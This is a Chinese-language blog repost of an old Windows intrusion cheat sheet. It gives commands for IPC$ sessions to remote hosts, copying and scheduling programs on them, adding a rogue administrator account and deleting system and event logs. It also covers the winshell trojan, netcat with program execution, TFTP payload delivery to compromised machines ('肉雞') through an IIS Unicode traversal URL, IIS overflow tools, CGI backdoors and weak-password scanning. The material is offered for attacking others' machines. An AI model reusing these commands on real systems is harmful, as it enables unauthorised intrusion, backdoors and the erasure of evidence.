DOS指令

常用的幾條NET命令: 1. 知道對方ip查看對方的電腦名
方法:開始->運行->cmd->net view 對方ip或者 開始->運行->cmd->nbtstat -a 對方ip2. 知道對方電腦名查看對方ip方法:開始->運行->cmd->ping 對方電腦名
或者 開始->運行->cmd->nbtstat -a 對方電腦名
 (與遠端主機建立空管連接) net use \\IP位址\ipc$ " " /use:" "  (以管理員身份登錄遠端主機) net use \\IP位址\ipc$ " 密碼" /use:" Administrator" (傳送檔到遠端主機WINNT目錄下)copy 本機目錄路徑\程式 \\IP位址\admin$ (查看遠端主機時間) net time \\IP位址 (定時啟動某個程式) at \\IP位址 02:18 readme.exe (查看共用) net view \\IP地址 (查看netbios工作組列表) nbtstat -A IP地址 (將遠端主機C盤映射為自己的F盤) net use f: \\IP地址\c$ " " /user:" Administrator" (這兩條把自己增加到管理員組): net user 用戶名 密碼 /add net localgroup Administrators 用戶名 /add (斷開連接) net use \\IP位址\ipc$ /delete  del C:\winnt\system32\logfiles\*.* del C:\winnt\system32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log ============================  一、netsvc.exe 下面的命令分別是列出主機上的服務專案、查尋和遠端啟動主機的“ 時間任務” 服務:
netsvc /list \\IP地址 netsvc schedule \\IP地址 /query netsvc \\IP地址 schedule /start 二、OpenTelnet.exe 遠端啟動主機的Telnet服務,並綁定埠到7878,例如: OpenTelnet \\IP位址 用戶名 密碼 1 7878 然後就可以telnet到主機的7878埠,進入DOS方式下: telnet IP地址 7878 三、winshell.exe 一個非常小的木馬(不到6K),telnet到主機的7878埠,輸入密碼winshell,當看到CMD> 後,可打下面的命令:
p Path (查看winshell主程序的路徑資訊) b reBoot (重新啟動機器) d shutDown (關閉機器) s Shell (執行後你就會看到可愛的“ C:\>   x eXit (退出本次登錄會話,此命令並不終止winshell的運行) CMD> http://.../srv.exe (通過http下載其他網站上的檔到運行winshell的機器上) 四、3389登陸器,GUI方式登錄遠端主機的 五、elsave.exe 事件日誌清除工具
elsave -s \\IP地址 -l " application" -C elsave -s \\IP地址 -l " system" -C elsave -s \\IP地址 -l " security" -C  執行後成功清除應用程式日誌,系統日誌,安全性記錄檔
六、hbulot.exe 開啟win2kserverwinxp3389服務 hbulot [/r] 使用/r表示安裝完成後自動重起目標使設置生效。 七、nc.exe(netcat.exe) 一個很好的工具,一些腳本程式都要用到它,也可做溢出後的連接用。
想要連接到某處: nc [-options] hostname port[s] [ports] ... 綁定埠等待連接: nc -l -p port [-options] [hostname] [port] 參數-e prog 程式重定向,一旦連接,就執行 [危險!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h 説明資訊 -i secs 延時的間隔 -l 監聽模式,用於入站連接 -n 指定數字的IP位址,不能用hostname -o file 記錄16進制的傳輸 -p port 本地埠號 -r 任意指定本地及遠端埠 -s addr 本地源地址 -u UDP模式 -v 詳細輸出—  用兩個-v可得到更詳細的內容 -w secs timeout的時間 -z 將輸入輸出關掉—  用於掃描時 八、TFTPD32.EXE 把自己的電腦臨時變為一台FTP伺服器,讓肉雞來下載檔案,tftp命令要在肉雞上執行,通常要利用Unicode漏洞或telnet到肉雞,例如: http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機IP地址 get 檔案名 c:\winnt\system32\檔案名  然後可以直接令檔運行:
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+檔案名 九、prihack.exeIISprinter遠端緩衝區溢位工具。idqover.exe是溢出idq的,選擇“ 溢出後在一個埠監聽” ,然後用telnet連接它的監聽埠,如果溢出成功,一連它的埠,綁定的命令馬上執行。xploit.exe是一個圖形介面的ida溢出,成功以後winxp下需要打winxp  一○、ntis.execmd.execmdasp.asp是三個cgi-backdoorexe要放到cgi-bin目錄下,asp放到有ASP執行許可權的目錄。然後用IE流覽器連接。  一、一 Xscan命令列運行參數說明: 在檢測過程中,按" [空格]" 鍵可以查看各執行緒狀態及掃描進度,按" q" 鍵保存當前資料後提前退出程式,按" " 強行關閉程式。 1.命令格式: xscan -host [-] [其他選項xscan -file [其他選項其中 含義如下-port : 檢測常用服務的埠狀態(可通過\dat\config.ini檔的" PORT-SCAN-OPTIONS\PORT-LIST" 項定制待檢測埠列表)  -ftp : 檢測FTP弱口令(可通過\dat\config.ini檔設置用戶名/密碼字典檔)  -ntpass : 檢測NT-Server弱口令(可通過\dat\config.ini檔設置用戶名/密碼字典檔)  -cgi : 檢測CGI漏洞(可通過\dat\config.ini檔的" CGI-ENCODE\encode_type" 項設置編碼方案)  -iis : 檢測IIS漏洞(可通過\dat\config.ini檔的" CGI-ENCODE\encode_type" 項設置編碼方案)  [其他選項含義如下 -v: 顯示詳細掃描進度  -p: 跳過Ping不通的主機  -o: 跳過沒有檢測到開放埠的主機  -t : 指定最大併發執行緒數量和併發主機數量預設數量為100,10原文連結:http://wenku.baidu.com/view/d53542fd04a1b0717fd5ddd9.html 

這個網誌中的熱門文章

excel檔案異常變大(可能是物件造成的)

中華電信之合勤ZyXEL數據機的登入帳密

Exchange2013 人員離職(報到)強制更新 離線通訊錄 方式